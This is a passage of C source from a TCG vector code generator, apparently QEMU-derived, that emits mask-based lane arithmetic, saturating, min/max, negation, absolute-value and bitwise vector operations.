dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2 g = { .fni8 = tcg_gen_not_i64, .fniv = tcg_gen_not_vec, .fno = gen_helper_gvec_not, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; tcg_gen_gvec_2(tcg_ctx, dofs, aofs, oprsz, maxsz, &g); } /* Perform a vector addition using normal addition and a mask. The mask should be the sign bit of each lane. This 6-operation form is more efficient than separate additions when there are 4 or more lanes in the 64-bit operation. 
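   Written out, with m the sign-bit mask of each lane:

       d = ((a & ~m) + (b & ~m)) ^ ((a ^ b) & m)

   The low bits of each lane are added with the sign bits cleared, so no
   carry can cross a lane boundary, and the correct sign bit of each
   lane's sum is patched back in by the final xor.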
*/ static void gen_addv_mask(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b, TCGv_i64 m) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andc_i64(tcg_ctx, t1, a, m); tcg_gen_andc_i64(tcg_ctx, t2, b, m); tcg_gen_xor_i64(tcg_ctx, t3, a, b); tcg_gen_add_i64(tcg_ctx, d, t1, t2); tcg_gen_and_i64(tcg_ctx, t3, t3, m); tcg_gen_xor_i64(tcg_ctx, d, d, t3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } void tcg_gen_vec_add8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_8, 0x80)); gen_addv_mask(tcg_ctx, d, a, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_add16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_16, 0x8000)); gen_addv_mask(tcg_ctx, d, a, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_add32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t1, a, ~0xffffffffull); tcg_gen_add_i64(tcg_ctx, t2, a, b); tcg_gen_add_i64(tcg_ctx, t1, t1, b); tcg_gen_deposit_i64(tcg_ctx, d, t1, t2, 0, 32); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } static const TCGOpcode vecop_list_add[] = { INDEX_op_add_vec, 0 }; void tcg_gen_gvec_add(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g[4] = { { .fni8 = tcg_gen_vec_add8_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_add8, .opt_opc = vecop_list_add, .vece = MO_8 }, { .fni8 = tcg_gen_vec_add16_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_add16, .opt_opc = vecop_list_add, .vece = MO_16 }, { .fni4 = tcg_gen_add_i32, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_add32, .opt_opc = vecop_list_add, .vece = MO_32 }, { .fni8 = tcg_gen_add_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_add64, .opt_opc = vecop_list_add, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_adds(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2s g[4] = { { .fni8 = tcg_gen_vec_add8_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_adds8, .opt_opc = vecop_list_add, .vece = MO_8 }, { .fni8 = tcg_gen_vec_add16_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_adds16, .opt_opc = vecop_list_add, .vece = MO_16 }, { .fni4 = tcg_gen_add_i32, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_adds32, .opt_opc = vecop_list_add, .vece = MO_32 }, { .fni8 = tcg_gen_add_i64, .fniv = tcg_gen_add_vec, .fno = gen_helper_gvec_adds64, .opt_opc = vecop_list_add, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, c, &g[vece]); } void tcg_gen_gvec_addi(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_const_i64(tcg_ctx, c); tcg_gen_gvec_adds(tcg_ctx, vece, dofs, aofs, tmp, oprsz, maxsz); tcg_temp_free_i64(tcg_ctx, tmp); } static const TCGOpcode vecop_list_sub[] = { INDEX_op_sub_vec, 0 }; void tcg_gen_gvec_subs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t 
oprsz, uint32_t maxsz) { static const GVecGen2s g[4] = { { .fni8 = tcg_gen_vec_sub8_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_subs8, .opt_opc = vecop_list_sub, .vece = MO_8 }, { .fni8 = tcg_gen_vec_sub16_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_subs16, .opt_opc = vecop_list_sub, .vece = MO_16 }, { .fni4 = tcg_gen_sub_i32, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_subs32, .opt_opc = vecop_list_sub, .vece = MO_32 }, { .fni8 = tcg_gen_sub_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_subs64, .opt_opc = vecop_list_sub, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, c, &g[vece]); } /* Perform a vector subtraction using normal subtraction and a mask. Compare gen_addv_mask above. */ static void gen_subv_mask(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b, TCGv_i64 m) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_or_i64(tcg_ctx, t1, a, m); tcg_gen_andc_i64(tcg_ctx, t2, b, m); tcg_gen_eqv_i64(tcg_ctx, t3, a, b); tcg_gen_sub_i64(tcg_ctx, d, t1, t2); tcg_gen_and_i64(tcg_ctx, t3, t3, m); tcg_gen_xor_i64(tcg_ctx, d, d, t3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } void tcg_gen_vec_sub8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_8, 0x80)); gen_subv_mask(tcg_ctx, d, a, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_sub16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_16, 0x8000)); gen_subv_mask(tcg_ctx, d, a, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_sub32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t1, b, ~0xffffffffull); tcg_gen_sub_i64(tcg_ctx, t2, a, b); tcg_gen_sub_i64(tcg_ctx, t1, a, t1); tcg_gen_deposit_i64(tcg_ctx, d, t1, t2, 0, 32); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } void tcg_gen_gvec_sub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g[4] = { { .fni8 = tcg_gen_vec_sub8_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_sub8, .opt_opc = vecop_list_sub, .vece = MO_8 }, { .fni8 = tcg_gen_vec_sub16_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_sub16, .opt_opc = vecop_list_sub, .vece = MO_16 }, { .fni4 = tcg_gen_sub_i32, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_sub32, .opt_opc = vecop_list_sub, .vece = MO_32 }, { .fni8 = tcg_gen_sub_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_gvec_sub64, .opt_opc = vecop_list_sub, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } static const TCGOpcode vecop_list_mul[] = { INDEX_op_mul_vec, 0 }; void tcg_gen_gvec_mul(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g[4] = { { .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_mul8, .opt_opc = vecop_list_mul, .vece = MO_8 }, { .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_mul16, .opt_opc = vecop_list_mul, .vece = MO_16 }, { .fni4 = tcg_gen_mul_i32, .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_mul32, .opt_opc = 
vecop_list_mul, .vece = MO_32 }, { .fni8 = tcg_gen_mul_i64, .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_mul64, .opt_opc = vecop_list_mul, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_muls(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2s g[4] = { { .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_muls8, .opt_opc = vecop_list_mul, .vece = MO_8 }, { .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_muls16, .opt_opc = vecop_list_mul, .vece = MO_16 }, { .fni4 = tcg_gen_mul_i32, .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_muls32, .opt_opc = vecop_list_mul, .vece = MO_32 }, { .fni8 = tcg_gen_mul_i64, .fniv = tcg_gen_mul_vec, .fno = gen_helper_gvec_muls64, .opt_opc = vecop_list_mul, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, c, &g[vece]); } void tcg_gen_gvec_muli(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_const_i64(tcg_ctx, c); tcg_gen_gvec_muls(tcg_ctx, vece, dofs, aofs, tmp, oprsz, maxsz); tcg_temp_free_i64(tcg_ctx, tmp); } void tcg_gen_gvec_ssadd(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_ssadd_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_ssadd_vec, .fno = gen_helper_gvec_ssadd8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_ssadd_vec, .fno = gen_helper_gvec_ssadd16, .opt_opc = vecop_list, .vece = MO_16 }, { .fniv = tcg_gen_ssadd_vec, .fno = gen_helper_gvec_ssadd32, .opt_opc = vecop_list, .vece = MO_32 }, { .fniv = tcg_gen_ssadd_vec, .fno = gen_helper_gvec_ssadd64, .opt_opc = vecop_list, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_sssub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_sssub_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_sssub_vec, .fno = gen_helper_gvec_sssub8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_sssub_vec, .fno = gen_helper_gvec_sssub16, .opt_opc = vecop_list, .vece = MO_16 }, { .fniv = tcg_gen_sssub_vec, .fno = gen_helper_gvec_sssub32, .opt_opc = vecop_list, .vece = MO_32 }, { .fniv = tcg_gen_sssub_vec, .fno = gen_helper_gvec_sssub64, .opt_opc = vecop_list, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } static void tcg_gen_usadd_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 max = tcg_const_i32(tcg_ctx, -1); tcg_gen_add_i32(tcg_ctx, d, a, b); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, d, d, a, max, d); tcg_temp_free_i32(tcg_ctx, max); } static void tcg_gen_usadd_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 max = tcg_const_i64(tcg_ctx, -1); tcg_gen_add_i64(tcg_ctx, d, a, b); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, d, d, a, max, d); tcg_temp_free_i64(tcg_ctx, max); } void tcg_gen_gvec_usadd(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { 
INDEX_op_usadd_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_usadd_vec, .fno = gen_helper_gvec_usadd8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_usadd_vec, .fno = gen_helper_gvec_usadd16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_usadd_i32, .fniv = tcg_gen_usadd_vec, .fno = gen_helper_gvec_usadd32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_usadd_i64, .fniv = tcg_gen_usadd_vec, .fno = gen_helper_gvec_usadd64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } static void tcg_gen_ussub_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 min = tcg_const_i32(tcg_ctx, 0); tcg_gen_sub_i32(tcg_ctx, d, a, b); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, d, a, b, min, d); tcg_temp_free_i32(tcg_ctx, min); } static void tcg_gen_ussub_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 min = tcg_const_i64(tcg_ctx, 0); tcg_gen_sub_i64(tcg_ctx, d, a, b); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, d, a, b, min, d); tcg_temp_free_i64(tcg_ctx, min); } void tcg_gen_gvec_ussub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_ussub_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_ussub_vec, .fno = gen_helper_gvec_ussub8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_ussub_vec, .fno = gen_helper_gvec_ussub16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_ussub_i32, .fniv = tcg_gen_ussub_vec, .fno = gen_helper_gvec_ussub32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_ussub_i64, .fniv = tcg_gen_ussub_vec, .fno = gen_helper_gvec_ussub64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_smin(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_smin_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_smin_vec, .fno = gen_helper_gvec_smin8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_smin_vec, .fno = gen_helper_gvec_smin16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_smin_i32, .fniv = tcg_gen_smin_vec, .fno = gen_helper_gvec_smin32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_smin_i64, .fniv = tcg_gen_smin_vec, .fno = gen_helper_gvec_smin64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_umin(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_umin_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_umin_vec, .fno = gen_helper_gvec_umin8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_umin_vec, .fno = gen_helper_gvec_umin16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_umin_i32, .fniv = tcg_gen_umin_vec, .fno = gen_helper_gvec_umin32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_umin_i64, .fniv = tcg_gen_umin_vec, .fno = gen_helper_gvec_umin64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_smax(TCGContext *tcg_ctx, unsigned 
vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_smax_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_smax_vec, .fno = gen_helper_gvec_smax8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_smax_vec, .fno = gen_helper_gvec_smax16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_smax_i32, .fniv = tcg_gen_smax_vec, .fno = gen_helper_gvec_smax32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_smax_i64, .fniv = tcg_gen_smax_vec, .fno = gen_helper_gvec_smax64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_umax(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_umax_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_umax_vec, .fno = gen_helper_gvec_umax8, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_umax_vec, .fno = gen_helper_gvec_umax16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_umax_i32, .fniv = tcg_gen_umax_vec, .fno = gen_helper_gvec_umax32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_umax_i64, .fniv = tcg_gen_umax_vec, .fno = gen_helper_gvec_umax64, .opt_opc = vecop_list, .vece = MO_64 } }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } /* Perform a vector negation using normal negation and a mask. Compare gen_subv_mask above. */ static void gen_negv_mask(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b, TCGv_i64 m) { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andc_i64(tcg_ctx, t3, m, b); tcg_gen_andc_i64(tcg_ctx, t2, b, m); tcg_gen_sub_i64(tcg_ctx, d, m, t2); tcg_gen_xor_i64(tcg_ctx, d, d, t3); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } void tcg_gen_vec_neg8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_8, 0x80)); gen_negv_mask(tcg_ctx, d, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_neg16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b) { TCGv_i64 m = tcg_const_i64(tcg_ctx, dup_const(MO_16, 0x8000)); gen_negv_mask(tcg_ctx, d, b, m); tcg_temp_free_i64(tcg_ctx, m); } void tcg_gen_vec_neg32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t1, b, ~0xffffffffull); tcg_gen_neg_i64(tcg_ctx,t2, b); tcg_gen_neg_i64(tcg_ctx,t1, t1); tcg_gen_deposit_i64(tcg_ctx, d, t1, t2, 0, 32); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } void tcg_gen_gvec_neg(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_neg_vec, 0 }; static const GVecGen2 g[4] = { { .fni8 = tcg_gen_vec_neg8_i64, .fniv = tcg_gen_neg_vec, .fno = gen_helper_gvec_neg8, .opt_opc = vecop_list, .vece = MO_8 }, { .fni8 = tcg_gen_vec_neg16_i64, .fniv = tcg_gen_neg_vec, .fno = gen_helper_gvec_neg16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_neg_i32, .fniv = tcg_gen_neg_vec, .fno = gen_helper_gvec_neg32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_neg_i64, .fniv = tcg_gen_neg_vec, .fno = gen_helper_gvec_neg64, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece 
<= MO_64); tcg_gen_gvec_2(tcg_ctx, dofs, aofs, oprsz, maxsz, &g[vece]); } static void gen_absv_mask(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b, unsigned vece) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); int nbit = 8 << vece; /* Create -1 for each negative element. */ tcg_gen_shri_i64(tcg_ctx, t, b, nbit - 1); tcg_gen_andi_i64(tcg_ctx, t, t, dup_const(vece, 1)); tcg_gen_muli_i64(tcg_ctx, t, t, (1 << nbit) - 1); /* * Invert (via xor -1) and add one (via sub -1). * Because of the ordering the msb is cleared, * so we never have carry into the next element. */ tcg_gen_xor_i64(tcg_ctx, d, b, t); tcg_gen_sub_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static void tcg_gen_vec_abs8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b) { gen_absv_mask(tcg_ctx, d, b, MO_8); } static void tcg_gen_vec_abs16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 b) { gen_absv_mask(tcg_ctx, d, b, MO_16); } void tcg_gen_gvec_abs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_abs_vec, 0 }; static const GVecGen2 g[4] = { { .fni8 = tcg_gen_vec_abs8_i64, .fniv = tcg_gen_abs_vec, .fno = gen_helper_gvec_abs8, .opt_opc = vecop_list, .vece = MO_8 }, { .fni8 = tcg_gen_vec_abs16_i64, .fniv = tcg_gen_abs_vec, .fno = gen_helper_gvec_abs16, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_abs_i32, .fniv = tcg_gen_abs_vec, .fno = gen_helper_gvec_abs32, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_abs_i64, .fniv = tcg_gen_abs_vec, .fno = gen_helper_gvec_abs64, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_2(tcg_ctx, dofs, aofs, oprsz, maxsz, &g[vece]); } void tcg_gen_gvec_and(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_and_i64, .fniv = tcg_gen_and_vec, .fno = gen_helper_gvec_and, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_mov(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_or(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_or_i64, .fniv = tcg_gen_or_vec, .fno = gen_helper_gvec_or, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_mov(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_xor(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_xor_i64, .fniv = tcg_gen_xor_vec, .fno = gen_helper_gvec_xor, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_dup8i(tcg_ctx, dofs, oprsz, maxsz, 0); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_andc(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_andc_i64, .fniv = tcg_gen_andc_vec, .fno = gen_helper_gvec_andc, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_dup8i(tcg_ctx, dofs, oprsz, maxsz, 0); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_orc(TCGContext *tcg_ctx, unsigned 
vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_orc_i64, .fniv = tcg_gen_orc_vec, .fno = gen_helper_gvec_orc, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_dup8i(tcg_ctx, dofs, oprsz, maxsz, -1); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_nand(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_nand_i64, .fniv = tcg_gen_nand_vec, .fno = gen_helper_gvec_nand, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_not(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_nor(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_nor_i64, .fniv = tcg_gen_nor_vec, .fno = gen_helper_gvec_nor, 